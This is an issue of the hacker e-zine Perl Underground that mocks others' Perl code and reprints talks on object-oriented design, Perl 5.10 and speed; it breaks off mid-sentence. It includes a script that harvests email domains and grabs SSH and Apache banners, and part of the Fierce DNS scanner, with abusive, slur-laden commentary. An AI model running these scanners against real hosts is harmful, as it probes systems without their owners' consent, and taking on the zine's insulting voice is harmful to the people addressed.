$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$ $$$$ %%%%%%%% X x $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ %%%%%%%% x H H $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ %% H H H x $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ %% H H H H $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ %%%%% H H H H $$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$ $$$$ %%%%% % X HHHHHHHHH $$$$$$$$$$ $$$$ $$$$$$$$$$ $$$$ %% H HHHHHHHHH $$$$ $$$$ $$$$ $$$$ $$$$ %% %% HHHHHHHHHH $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ %% %%% HHHHHHH $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ %%%% %%%%% $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$ %% %% $$$$ $$$$ $$$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$ %% %% $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ %% %% $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ %%% $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$$$$$$$$$ %%%%%%% $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ %% %% $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ %%%%%%% $$$$$$$$$$$$$ $$$$ $$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ %% $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ %%%%%%% $$$$$$$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$ $$$$ $$$$$ $$$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$ $$$$$ $$$$$$$$$$$$ $$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ That's five, kids. [[email protected]]$ date Sat Mar 1 18:22:16 EST 2008 [[email protected]]$ perl game-on.pl Initiating... Dumping... $TOC[0x01] = rant( Intro => q{ What it's all about } ); $TOC[0x02] = school( PHC => q{ trix are for kids } ); $TOC[0x03] = school_you( Damian => q{ Damian on when to use OO } ); $TOC[0x04] = rant( Perl_5_10 => q{ It's here! } ); $TOC[0x05] = school( RS_IceShaman => q{ Web hax0rs combined their "skills" } ); $TOC[0x06] = school_you( nwclark => q{ Nicolas Clark on speed, old school } ); $TOC[0x07] = school( n00b => q{ The nick says it all } ); $TOC[0x08] = school_you( merlyn => q{ Batman uses Scalar::Util and List::Util } ); $TOC[0x09] = school( ilja => q{ He poked his nose out again } ); $TOC[0x0A] = school_you( LR => q{ Higher-Order Functions } ); $TOC[0x0B] = rant( Intermission => q{ Laugh it up } ); $TOC[0x0C] = school( kokanin => q{ PU5 goes retro, have you noticed? } ); $TOC[0x0D] = school_you( broquaint => q{ Closure on Closures } ); $TOC[0x0E] = school( str0ke => q{ And of course str0ke contributed a piece } ); $TOC[0x0F] = school_you( Abigail => q{ Abigail's points on style } ); $TOC[0x10] = school( h4cky0u => q{ If only they could code } ); $TOC[0x11] = rant( Advocacy => q{ Perl rocks, no doubt. } ); $TOC[0x12] = school_you( Roy_Johnson => q{ Iterators and recursion } ); $TOC[0x13] = school( Gumbie => q{ Whatever makes him sleep at night } ); $TOC[0x14] = school_you( grinder => q{ grinder talks about 5.10 } ); $TOC[0x15] = rant( Reading => q{ Your reading list for this week } ); $TOC[0x16] = school( hessamx => q{ We are critical of friend and fan } ); $TOC[0x17] = school_you( Ovid => q{ Ovid's OO points } ); $TOC[0x18] = school( tssci => q{ Some noobs who provide "security" } ); $TOC[0x19] = rant( Outro => q{ All good things come to an end } ); Schooling... -[0x01] # Welcome back to the show --------------------------------------- The official theme of Perl Underground 5 is the highly-anticipated, recently-released, Perl 5.10. This theme is more in spirit than in quantity: we have only a couple of articles on the topic. Besides that, we bring to you all the exciting Perl material that you can handle. We have impressive collections of bad code to create lessons from, and educational pieces by (mostly) established Perl experts. Let's get this party started. -[0x02] # PHC: Had better stuff to not publish --------------------------- #!/usr/bin/perl # usage: own-kyx.pl narc1.txt # # this TEAM #PHRACK script will extract the email addresses # out of the narc*.txt files, enumerate the primary MX and NS # for each domain, and grab the SSHD and APACHE server version # from each of these hosts (if possible). # # For educational purposes only. Do not use. # lawl this is old shit (but not past the statute of limitations) # lets rag on old "TEAM #PHRACK" # strict and warnings bitch use IO::Socket; # lawl you could just do @ARGV or die "..."; if ($#ARGV<0) {die "you didn't supply a filename/n";} $nrq =$ARGV[0]; # or my $nrq = shift or die "..."; # this is probably the dirty way to do it, you could whitelist # with more accuracy and ease # look up qr// plzkthnx $msearch = '([^":/s<>()/;]*@[^":/s<>()/;/.]*.[^":/s<>()/;]*)'; # very lame. use a lexical filehandle, specify the open method, # don't quote the variable open (INF, "$nrq") or die $!; # //i is unnecessary, so is //g, and you could do this without # $&, let alone quoting it, and this is really the gross way to # do it in general while(<INF>){ if (m,$msearch,ig){push(@targets, "$&");} } close INF; # plus you can do this while you read the file, not read it all # first foreach $victim (@targets) { print "=====/t$victim /t=====/n"; my ($lusr, $domn) = split(/@/, $victim); $smtphost = `host -tMX $domn |cut -d/" /" -f7 | head -1`; # whats with random trailers? //e not even used here, you have # an empty replacement! dumbfucks $smtphost =~ s/[/r/n]+$//ge; print ":: Primary MX located at $smtphost/n"; sshcheq($smtphost); apachecheq($smtphost); $nshost = `host -tNS $domn |cut -d/" /" -f4 | head -1`; # //e again? wtf? $nshost =~ s/[/r/n]+$//ge; sleep(3); print ":: Primary NS located at $nshost/n"; sshcheq($nshost); apachecheq($nshost); print "/n/n"; # parens everywhere sleep(3); } sub sshcheq { # I think someone is confused about where his paren is supposed to go! (my $sshost) = @_; print ":: Testing $sshost for sshd version/n"; # not a single good variable name in this script $g = inet_aton($sshost); my $prot = 22; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!/n"; if(connect(S,pack "SnA4x8",2,$prot,$g)) { # omg this line isn't too bad my @in; select(S); $|=1; print "/n"; while(<S>){ push @in, $_;} # @in = <S>; # lawl # Parse while reading the file select(STDOUT); close(S); # man this is old school.. foreach $res (@in) { if ($res =~ /SSH/) { # MOST COMPLEX YOUR PROGRAM IS chomp $res; print ":: SSHD version - $res/n"; } } } else { return 0; } # coulda done this first and saved some # in-den-tation } # same shit different subroutine, maybe you could have made them into one # with a pair of parameters HMM? sub apachecheq { (my $whost) = @_; print ":: Testing $whost for Apache version/n"; $g = inet_aton($whost); my $prot = 80; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!/n"; if(connect(S,pack "SnA4x8",2,$prot,$g)) { my @in; select(S); $|=1; print "HEAD / HTTP/1.0/r/n/r/n"; while(<S>){ push @in, $_;} select(STDOUT); close(S); foreach $res (@in) { if ($res =~ /ache/) { chomp $res; print ":: HTTPD version - $res/n"; } } } else { return 0; } } -[0x03] # Damian Conway's 10 considerations about using OO --------------- On Saturday, June 23rd, Damian Conway had a little free-for-all workshop that he gave at College of DuPage in Wheaton, IL. Although the whole day was fascinating, the most useful part for me was his discussion of ``Ten criteria for knowing when to use object-oriented design''. Apparently, Damian was once a member of Spinal Tap, because his list goes to eleven. Damian said that this list, in expanded form, is going to be part of the standard Perl distribution soon. - Design is large, or is likely to become large - When data is aggregated into obvious structures, especially if there's a lot of data in each aggregate For instance, an IP address is not a good candidate: There's only 4 bytes of information related to an IP address. An immigrant going through customs has a lot of data related to him, such as name, country of origin, luggage carried, destination, etc. - When types of data form a natural hierarchy that lets us use inheritance. Inheritance is one of the most powerful feature of OO, and the ability to use it is a flag. - When operations on data varies on data type GIFs and JPGs might have their cropping done differently, even though they're both graphics. - When it's likely you'll have to add data types later OO gives you the room to expand in the future. - When interactions between data is best shown by operators Some relations are best shown by using operators, which can be overloaded. - When implementation of components is likely to change, especially in the same program - When the system design is already object-oriented - When huge numbers of clients use your code If your code will be distributed to others who will use it, a standard interface will make maintenence and safety easier. - When you have a piece of data on which many different operations are applied Graphics images, for instance, might be blurred, cropped, rotated, and adjusted. - When the kinds of operations have standard names (check, process, etc) Objects allow you to have a DB::check, ISBN::check, Shape::check, etc without having conflicts between the types of check. -[0x04] # Perl 5.10 has arrived ------------------------------------------ First, allow us to explain Perl versions, so you understand just what this means. Note, especially, that Perl 5.10 is not Perl 5.1, it's Perl 5.10, which comes after Perl 5.9. It's not Perl 6, it's the latest continuation of the Perl 5 language. Perl 6 is still coming. Major releases: Perl 1 was released in December 1987. Perl 2 was released in June 1988. Perl 3 was released in October 1989. Perl 4 was released in March 1991. Perl 5 (excluding alpha/beta/gamma releases) was released in October 1994. Now, at this point it might seem weird that Perl jumped four versions in seven years, yet in the 14 since then it has not moved on. Partially, it has, Perl 6 has been (roughly) specified and implemented. But it isn't quite *here*, for various reasons. Secondly, jumping major versions for reasons such as publishing a book seems a bit silly, so they do not do it anymore. Perl 5 introduced a different way of versioning advances in Perl. Thirdly, Perl is more stable and mature now, the rate of growth has slowed. Perl 5.004 was released in May 1997. Perl 5.005 was released in July 1998. Perl 5.6 was released in March 2000. There was no Perl 5.2 or 5.4. Perl 5.8 was released in July 2002. Perl 5.10 has now been released, on December 18, 2007, 20 years to the day after Perl 1. That's one long story! The story is that now even decimals represent stable releases, while odd ones (5.9) represent the working development version. See perlhist for much more detail. Perl 5.10 is a big deal. We have been using Perl 5.8 for six years now. Like any other Perl release, 5.10 has brought some things that will change how we code Perl. It also brought some things that won't do that, and some things that we might think better of in a few years. Here are a few of the good ones that you're likely to see. say(). say() is like Ruby puts(), or Python print(), or Perl 6 say(), etc. All it is is a print with a newline. It'll definitely be less of a pain in the ass than print and a /n, and looks cleaner. The defined-or operator. Sometimes you want to set something to a value, like a configuration value, but also have a default. You can't always do: my $flag = $conf{flag} || $default;, because what if $conf{flag} is explicably set to 0? So you end up doing: my $flag = defined $conf{flag} ? $conf{flag} : $default;. Here's the new way: my $flag = $conf{flag} // $default; Lexical $_. Instead of being worried about clobbering $_, we can create a lexical version and all is good, leading to shorter syntax. State variables. This is something we should have had a long time ago. They are similar in concept to C static variables. Better than using a closure (which has also improved in Perl 5.10), usually. The notorious given statement: Perl finally has a switch statement. Kind of. Take a look, the syntax is kind of a hassle and will make you wonder why you aren't just using if blocks. Until you read how it uses smart matching. The naming is smartly in-tune with the linguistic character of Perl. Last and not least, smart matching! Possibly the single most pressing change in Perl 5.10 is smart matching. Smart matching is just that, you give two operands and Perl compares them in a natural way. Gives us a whole new area to be confused in, and to create data-dependent runtime bugs. perlsyn has been updated, and this is the juicy bit: ~~~~~ The behaviour of a smart match depends on what type of thing its arguments are. It is always commutative, i.e. $a ~~ $b behaves the same as $b ~~ $a. The behaviour is determined by the following table: the first row that applies, in either order, determines the match behaviour. $a $b Type of Match Implied Matching Code ====== ===== ===================== ============= (overloading trumps everything) Code[+] Code[+] referential equality $a == $b Any Code[+] scalar sub truth $b->($a) Hash Hash hash keys identical [sort keys %$a]~~[sort keys %$b] Hash Array hash slice existence grep {exists $a->{$_}} @$b Hash Regex hash key grep grep /$b/, keys %$a Hash Any hash entry existence exists $a->{$b} Array Array arrays are identical[*] Array Regex array grep grep /$b/, @$a Array Num array contains number grep $_ == $b, @$a Array Any array contains string grep $_ eq $b, @$a Any undef undefined !defined $a Any Regex pattern match $a =~ /$b/ Code() Code() results are equal $a->() eq $b->() Any Code() simple closure truth $b->() # ignoring $a Num numish[!] numeric equality $a == $b Any Str string equality $a eq $b Any Num numeric equality $a == $b Any Any string equality $a eq $b + - this must be a code reference whose prototype (if present) is not "" (subs with a "" prototype are dealt with by the 'Code()' entry lower down) * - that is, each element matches the element of same index in the other array. If a circular reference is found, we fall back to referential equality. ! - either a real number, or a string that looks like a number The "matching code" doesn't represent the real matching code, of course: it's just there to explain the intended meaning. Unlike grep, the smart match operator will short-circuit whenever it can. ~~~~ Smart matching is one of those fancy Perl 6 features that some people did not want backported to Perl 5. The official PU position is that when Perl 6 comes to the show, the world will probably use it, sooner or later. But until then, don't hold anything back, Perl 5 is beautiful and we can continue to make it better. More on Perl 5.10 at the end of the zine. If you can't wait, check out these pieces right now. Or do it later, but either way, read them. There is a lot more than just what we have summarized here. http://dev.perl.org/perl5/news/2007/perl-5.10.0.html http://search.cpan.org/dist/perl-5.10.0/pod/perl5100delta.pod -[0x05] # RSnake is RJoke, and IceShaman isn't much better --------------- #!/usr/bin/perl ######################################### # Fierce v0.9.9 - Beta 03/24/2007 # By RSnake http://ha.ckers.org/fierce/ # Threading and additions by IceShaman ######################################### # Finally, something with some length to it.. let's do this... use strict; # Nice, but no warnings? use Net::hostent; use Net::DNS; use IO::Socket; use Socket; use Getopt::Long; # props. # command line options my $class_c; my $delay = 0; my $dns; my $dns_file; my $dns_server; my @dns_servers; my $filename; my $full_output; my $help; my $http_connect; my $nopattern; my $range; my $search; my $suppress; my $tcp_timeout; my $threads; my $traverse; my $version; my $wide; my $wordlist; # You know that my() can take a comma seperated list of arguments, right? my @common_cnames; my $count_hostnames = 0; my @domain_ns; my $h; my @ip_and_hostname; my $logging; my %options = (); my $res = Net::DNS::Resolver->new; my $search_found; my %subnets; my %tested_names; my $this_ip; my $version_num = 'Version 0.9.9 - Beta 03/24/2007'; my $webservers = 0; my $wildcard_dns; my @wildcards; my @zone; my $count; my %known_ips; my %known_names; my @output; my @thread; my $thread_support; # Wow, nice load of variables there. # Way to embrace the concept of lexical variables by having 40 of them be global $count = 0; # Why not set it to zero when you declare it? # ignore all errors while trying to load up thead stuff BEGIN { $SIG{__DIE__} = sub { }; $SIG{__WARN__} = sub { }; } # try and load thread modules, if it works import their functions BEGIN { eval { require threads; require threads::shared; require Thread::Queue; $thread_support = 1; }; if ($@) { # got errors, no ithreads :( # awww... what a shame... there's always 505threads though $thread_support = 0; } else { #safe to haul in the threadding functions import threads; import threads::shared; import Thread::Queue; } } # turn errors back on BEGIN { $SIG{__DIE__} = 'DEFAULT'; $SIG{__WARN__} = 'DEFAULT'; } # OK really, why did you need three BEGIN blocks? # Why not just use() them in the eval, because you catch failure # anyways? # Do you think your signal catching is actually useful here? # We will see more confusion as we go my $result = GetOptions ( 'dns=s' => /$dns, 'file=s' => /$filename, 'suppress' => /$suppress, 'help' => /$help, 'connect=s' => /$http_connect, 'range=s' => /$range, 'wide' => /$wide, 'delay=i' => /$delay, 'dnsfile=s' => /$dns_file, 'dnsserver=s' => /$dns_server, 'version' => /$version, 'search=s' => /$search, 'wordlist=s' => /$wordlist, 'fulloutput' => /$full_output, 'nopattern' => /$nopattern, 'tcptimeout=i' => /$tcp_timeout, 'traverse=i' => /$traverse, 'threads=i' => /$threads, ); help() if $help; # excellent oneliner there quit_early($version_num) if $version; if (!$dns && !$range) { # Try 'not' and 'and' output("You have to use the -dns switch with a domain after it."); quit_early("Type: perl fierce.pl -h for help"); } elsif ($dns && $dns !~ /[a-z/d.-]/.[a-z]*/i) { # you want + not * output("/n/tUhm, no. /"$dns/" is gimp. A bad domain can mess up your day."); quit_early("/tTry again."); } if ($filename && $filename ne '') { # If it has a value and if it's not equal to '' eh? # Does anyone else see the redundancy there? # If it passes the first condition, it will ALWAYS pass the second # $logging = 1; if (-e $filename) { # file exists print "File already exists, do you want to overwrite it? [Y|N] "; chomp(my $overwrite = <STDIN>); if ($overwrite eq 'y' || $overwrite eq 'Y') { open FILE, '>', $filename or quit_early("Having trouble opening $filename anyway"); # nice. a 3 arg open and a good use of an 'or' ! } else { # Your paren style sucks. quit_early('Okay, giving up'); } } else { open FILE, '>', $filename or quit_early("Having trouble opening $filename"); } # man you could have made this cleaner, could have just done a # quit_early for a n/N and then open otherwise output('Now logging to ' . $filename); } if ($http_connect) { unless (-e $http_connect) { open (HEADERS, "$http_connect") # Why'd you quote the scalar here, but # not above? And don't you know about # the security risks of using open() # like this or quit_early("Having trouble opening $http_connect"); close HEADERS; # uh... open... and close... Are you just testing that # you can? -r for that } } # if user doesn't provide a number, they both end up at 0 quit_early('Your delay tag must be a positive integer') if ($delay && $delay != 0 && $delay !~ /^/d*$/); # Try 'and' instead of '&&'. Also, lose the parens. # You still don't understand how this works: if the first condition # passes, the second ALWAYS will. # what you probably think is happening is this: # if ( defined $delay && $delay != 0 && $delay !~ /^/d*$/) # But it isn't. You're just a noob. quit_early('Your thread tag must be a positive integer') if ($threads && $threads != 0 && $threads !~ /^/d*$/); # isn't if ($threads and not $thread_support) pretty smooth to read? # smooth like silk if ($threads && !$thread_support) { quit_early('Perl is not configured to support ithreads'); } if ($dns_file) { open (DNSFILE, '<', $dns_file) or quit_early("Can't open $dns_file"); for (<DNSFILE>) { chomp; push @dns_servers, $_; # yucky sucky } if (@dns_servers) { output("Using DNS servers from $dns_file"); } else { output("DNS file $dns_file is empty, using default options"); } } # OK these guys are just too lame to profile much more of their code # We're gonna cut almost all of it out and just point out a few especially # funny parts # lol how about $tcp_timeout ||= 10; # or $res->tcp_timeout($tcp_timeout || 10 ); if ($tcp_timeout) { $res->tcp_timeout($tcp_timeout); } else { $res->tcp_timeout(10); } # lawl someone meant > 255! Someone did not test his shitty code! quit_early('The -t flag must contain an integer 0-255') if $traverse < 255; # This line here makes those or's look kinda dumb, huh? $wordlist = $wordlist || 'hosts.txt'; if (-e $wordlist) { # user provided or default open (WORDLIST, '<', $wordlist) or open (WORDLIST, '<', 'hosts.txt') or quit_early("Can't open $wordlist or the default wordlist"); # how about just ++ it? 0 + 1 = 1 if ( $subnets{"$bytes[0].$bytes[1].$bytes[2]"} ) { $subnets{"$bytes[0].$bytes[1].$bytes[2]"}++; } else { $subnets{"$bytes[0].$bytes[1].$bytes[2]"} = 1; } } # wasted variables, didn't check if the regex matched, used * instead of + if ($wide) { ($lowest, $highest) = (0, 255); } else { # user provided range if ($octet[3] =~ /(/d*)-(/d*)/) { ($lowest, $highest) = ($1, $2); quit_early("Your range doesn't make sense, try again") } # WHAT COMPLEX FEATURES YOU LACK #TODO: add port selection and range support my $socket = new IO::Socket::INET ( PeerAddr => "$ip_and_hostname[0]", PeerPort => 'http(80)', Timeout => 10, Proto => 'tcp', ) # It's just all very silly and stupid. To think that these guys wrote this up, # didn't clean it, didn't even test it, and then released it to the world like # it was big shit and they were bigger. kids, just keep your shitty code to # yourself. Or send it to us for PU+ certification. # RSnake needs to stick to his nice easy PHP world, where he can be a god # among retards. Same for IceShaman and HTS. Neither can play with grown-ups. -[0x06] # Nicolas Clark with some (old) notes on speed ------------------- Nicholas Clark - When perl is not quite fast enough Introduction So you have a perl script. And it's too slow. And you want to do something about it. This is a talk about what you can do to speed it up, and also how you try to avoid the problem in the first place. Obvious things Find better algorithm Your code runs in the most efficient way that you can think of. But maybe someone else looked at the problem from a completely different direction and found an algorithm that is 100 times faster. Are you sure you have the best algorithm? Do some research. Throw more hardware at it If the program doesn't have to run on many machines may be cheaper to throw more hardware at it. After all, hardware is supposed to be cheap and programmers well paid. Perhaps you can gain performance by tuning your hardware better; maybe compiling a custom kernel for your machine will be enough. mod_perl For a CGI script that I wrote, I found that even after I'd shaved everything off it that I could, the server could still only serve 2.5 per second. The same server running the same script under mod_perl could serve 25 per second. That's a factor of 10 speedup for very little effort. And if your script isn't suitable for running under mod_perl there's also fastcgi (which CGI.pm supports). And if your script isn't a CGI, you could look at the persistent perl daemon, package PPerl on CPAN. Rewrite in C, er C++, sorry Java, I mean C#, oops no ... Of course, one final "obvious" solution is to re-write your perl program in a language that runs as native code, such as C, C++, Java, C# or whatever is currently flavour of the month. But these may not be practical or politically acceptable solutions. Compromises So you can compromise. XS You may find that 95% of the time is spent in 5% of the code, doing something that perl is not that efficient at, such as bit shifting. So you could write that bit in C, leave the rest in perl, and glue it together with XS. But you'd have to learn XS and the perl API, and that's a lot of work. Inline Or you could use Inline. If you have to manipulate perl's internals then you'll still have to learn perl's API, but if all you need is to call out from perl to your pure C code, or someone else's C library then Inline makes it easy. Here's my perl script making a call to a perl function rot32. And here's a C function rot32 that takes 2 integers, rotates the first by the second, and returns an integer result. That's all you need! And you run it and it works. #!/usr/local/bin/perl -w use strict; printf "$_:/t%08X/t%08X/n", rot32 (0xdead, $_), rot32 (0xbeef, -$_) foreach (0..31); use Inline C => <<'EOC'; unsigned rot32 (unsigned val, int by) { if (by >= 0) return (val >> by) | (val << (32 - by)); return (val << -by) | (val >> (32 + by)); } EOC __END__ 0: 0000DEAD 0000BEEF 1: 80006F56 00017DDE 2: 400037AB 0002FBBC 3: A0001BD5 0005F778 4: D0000DEA 000BEEF0 ... Compile your own perl? Are you running your script on the perl supplied by the OS? Compiling your own perl could make your script go faster. For example, when perl is compiled with threading, all its internal variables are made thread safe, which slows them down a bit. If the perl is threaded, but you don't use threads then you're paying that speed hit for no reason. Likewise, you may have a better compiler than the OS used. For example, I found that with gcc 3.2 some of my C code run 5% faster than with 2.9.5. [One of my helpful hecklers in the audience said that he'd seen a 14% speedup, (if I remember correctly) and if I remember correctly that was from recompiling the perl interpreter itself] Different perl version? Try using a different perl version. Different releases of perl are faster at different things. If you're using an old perl, try the latest version. If you're running the latest version but not using the newer features, try an older version. Banish the demons of stupidity Are you using the best features of the language? hashes There's a Larry Wall quote - Doing linear scans over an associative array is like trying to club someone to death with a loaded Uzi. I trust you're not doing that. But are you keeping your arrays nicely sorted so that you can do a binary search? That's fast. But using a hash should be faster. regexps In languages without regexps you have to write explicit code to parse strings. perl has regexps, and re-writing with them may make things 10 times faster. Even using several with the /G anchor and the /gc flags may still be faster. if ( //G.../gc ) { ... } elsif ( //G.../gc ) { ... } elsif ( //G.../gc ) { pack and unpack pack and unpack have far too many features to remember. Look at the manpage - you may be able to replace entire subroutines with just one unpack. undef undef. what do I mean undef? Are you calculating something only to throw it away? For example the script in the Encode module that compiles character conversion tables would print out a warning if it saw the same character twice. If you or I build perl we'll just let those build warnings scroll off the screen - we don't care - we can't do anything about it. And it turned out that keeping track of everything needed to generate those warnings was slowing things down considerably. So I added a flag to disable that code, and perl 5.8 defaults to use it, so it builds more quickly. Intermission Various helpful hecklers (most of London.pm who saw the talk (and I'm counting David Adler as part of London.pm as he's subscribed to the list)) wanted me to remind people that you really really don't want to be optimising unless you absolutely have to. You're making your code harder to maintain, harder to extend, and easier to introduce new bugs into. Probably you've done something wrong to get to the point where you need to optimise in the first place. I agree. Also, I'm not going to change the running order of the slides. There isn't a good order to try to describe things in, and some of the ideas that follow are actually more "good practice" than optimisation techniques, so possibly ought to come before the slides on finding slowness. I'll mark what I think are good habits to get into, and once you understand the techniques then I'd hope that you'd use them automatically when you first write code. That way (hopefully) your code will never be so slow that you actually want to do some of the brute force optimising I describe here. Tests Must not introduce new bugs The most important thing when you are optimising existing working code is not to introduce new bugs. Use your full regression tests :-) For this, you can use your full suite of regression tests. You do have one, don't you? [At this point the audience is supposed to laugh nervously, because I'm betting that very few people are in this desirable situation of having comprehensive tests written] Keep a copy of original program You must keep a copy of your original program. It is your last resort if all else fails. Check it into a version control system. Make an off site backup. Check that your backup is readable. You mustn't lose it. In the end, your ultimate test of whether you've not introduced new bugs while optimising is to check that you get identical output from the optimised version and the original. (With the optimised version taking less time). What causes slowness CPU It's obvious that if you script hogs the CPU for 10 seconds solid, then to make it go faster you'll need to reduce the CPU demand. RAM A lesser cause of slowness is memory. perl trades RAM for speed One of the design decisions Larry made for perl was to trade memory for speed, choosing algorithms that use more memory to run faster. So perl tends to use more memory. getting slower (relative to CPU) CPUs keep getting faster. Memory is getting faster too. But not as quickly. So in relative terms memory is getting slower. [Larry was correct to choose to use more memory when he wrote perl5 over 10 years ago. However, in the future CPU speed will continue to diverge from RAM speed, so it might be an idea to revisit some of the CPU/RAM design trade offs in parrot] memory like a pyramid You can never have enough memory, and it's never fast enough. Computer memory is like a pyramid. At the point you have the CPU and its registers, which are very small and very fast to access. Then you have 1 or more levels of cache, which is larger, close by and fast to access. Then you have main memory, which is quite large, but further away so slower to access. Then at the base you have disk acting as virtual memory, which is huge, but very slow. Now, if your program is swapping out to disk, you'll realise, because the OS can tell you that it only took 10 seconds of CPU, but 60 seconds elapsed, so you know it spent 50 seconds waiting for disk and that's your speed problem. But if your data is big enough to fit in main RAM, but doesn't all sit in the cache, then the CPU will keep having to wait for data from main RAM. And the OS timers I described count that in the CPU time, so it may not be obvious that memory use is actually your problem. This is the original code for the part of the Encode compiler (enc2xs) that generates the warnings on duplicate characters: if (exists $seen{$uch}) { warn sprintf("U%04X is %02X%02X and %02X%02X/n", $val,$page,$ch,@{$seen{$uch}}); } else { $seen{$uch} = [$page,$ch]; } It uses the hash %seen to remember all the Unicode characters that it has processed. The first time that it meets a character it won't be in the hash, the exists is false, so the else block executes. It stores an arrayref containing the code page and character number in that page. That's three things per character, and there are a lot of characters in Chinese. If it ever sees the same Unicode character again, it prints a warning message. The warning message is just a string, and this is the only place that uses the data in %seen. So I changed the code - I pre-formatted that bit of the error message, and stored a single scalar rather than the three: if (exists $seen{$uch}) { warn sprintf("U%04X is %02X%02X and %04X/n", $val,$page,$ch,$seen{$uch}); } else { $seen{$uch} = $page << 8 | $ch; } That reduced the memory usage by a third, and it runs more quickly. Step by step How do you make things faster? Well, this is something of a black art, down to trial and error. I'll expand on aspects of these 4 points in the next slides. What might be slow? You need to find things that are actually slow. It's no good wasting your effort on things that are already fast - put it in where it will get maximum reward. Think of re-write But not all slow things can be made faster, however much you swear at them, so you can only actually speed things up if you can figure out another way of doing the same thing that may be faster. Try it But it may not. Check that it's faster and that it gives the same results. Note results Either way, note your results - I find a comment in the code is good. It's important if an idea didn't work, because it stops you or anyone else going back and trying the same thing again. And it's important if a change does work, as it stops someone else (such as yourself next month) tidying up an important optimisation and losing you that hard won speed gain. By having commented out slower code near the faster code you can look back and get ideas for other places you might optimise in the same way. Small easy things These are things that I would consider good practice, so you ought to be doing them as a matter of routine. AutoSplit and AutoLoader If you're writing modules use the AutoSplit and AutoLoader modules to make perl only load the parts of your module that are actually being used by a particular script. You get two gains - you don't waste CPU at start up loading the parts of your module that aren't used, and you don't waste the RAM holding the the structures that perl generates when it has compiled code. So your modules load more quickly, and use less RAM. One potential problem is that the way AutoLoader brings in subroutines makes debugging confusing, which can be a problem. While developing, you can disable AutoLoader by commenting out the __END__ statement marking the start of your AutoLoaded subroutines. That way, they are loaded, compiled and debugged in the normal fashion. ... 1; # While debugging, disable AutoLoader like this: # __END__ ... Of course, to do this you'll need another 1; at the end of the AutoLoaded section to keep use happy, and possibly another __END__. Schwern notes that commenting out __END__ can cause surprises if the main body of your module is running under use strict; because now your AutoLoaded subroutines will suddenly find themselves being run under use strict. This is arguably a bug in the current AutoSplit - when it runs at install time to generate the files for AutoLoader to use it doesn't add lines such as use strict; or use warnings; to ensure that the split out subroutines are in the same environment as was current at the __END__ statement. This may be fixed in 5.10. Elizabeth Mattijsen notes that there are different memory use versus memory shared issues when running under mod_perl, with different optimal solutions depending on whether your apache is forking or threaded. =pod @ __END__ If you are documenting your code with one big block of pod, then you probably don't want to put it at the top of the file. The perl parser is very fast at skipping pod, but it's not magic, so it still takes a little time. Moreover, it has to read the pod from disk in order to ignore it. #!perl -w use strict; =head1 You don't want to do that big block of pod =cut ... 1; __END__ =head1 You want to do this If you put your pod after an __END__ statement then the perl parser will never even see it. This will save a small amount of CPU, but if you have a lot of pod (>4K) then it might also mean that the last disk block(s) of a file are never even read in to RAM. This may gain you some speed. [A helpful heckler observed that modern raid systems may well be reading in 64K chunks, and modern OSes are getting good at read ahead, so not reading a block as a result of =pod @ __END__ may actually be quite rare.] If you are putting your pod (and tests) next to their functions' code (which is probably a better approach anyway) then this advice is not relevant to you. Needless importing is slow Exporter is written in perl. It's fast, but not instant. Most modules are able to export lots of their functions and other symbols into your namespace to save you typing. If you have only one argument to use, such as use POSIX; # Exports all the defaults then POSIX will helpfully export its default list of symbols into your namespace. If you have a list after the module name, then that is taken as a list of symbols to export. If the list is empty, no symbols are exported: use POSIX (); # Exports nothing. You can still use all the functions and other symbols - you just have to use their full name, by typing POSIX:: at the front. Some people argue that this actually makes your code clearer, as it is now obvious where each subroutine is defined. Independent of that, it's faster:use POSIX; use POSIX (); 0.516s 0.355s use Socket; use Socket (); 0.270s 0.231s POSIX exports a lot of symbols by default. If you tell it to export none, it starts in 30% less time. Socket starts in 15% less time. regexps avoid $& The $& variable returns the last text successfully matched in any regular expression. It's not lexically scoped, so unlike the match variables $1 etc it 